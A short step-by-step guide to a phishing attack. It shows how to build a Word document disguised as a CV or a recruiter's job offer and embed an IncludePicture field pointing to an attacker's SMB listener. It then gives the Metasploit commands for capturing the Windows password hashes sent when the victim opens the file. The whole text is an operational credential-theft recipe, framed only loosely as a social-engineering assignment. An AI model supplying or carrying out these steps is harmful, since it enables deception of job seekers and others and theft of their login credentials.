SE – UNC word doc

1. Create a MSWORD document tweaking the visual appearance as required, examples of ideas that work great during social engineering assignments are CV’s or job information under the pretence of it been sent from a job recruiter.

2. Click on INSERT / Quick Parts / Insert Field.

 3. Choose IncludePicture add your UNC link (IP-Address of the SMB listener) under the “Filename or URL” properties field and tick “Data not stored with the document” Click OK

4. Save the word document at a .docx file

5. Start the Metasploit SMB listener and then you’re ready to send your word document with embedded UNC image request.

use auxiliary/server/capture/smb

set cainpwfile /tmp/cain-smb

set johnpwfile /tmp/john-smb

set logfile /tmp/logfile

set srvhost (The IP address of the VPN real world external IP address)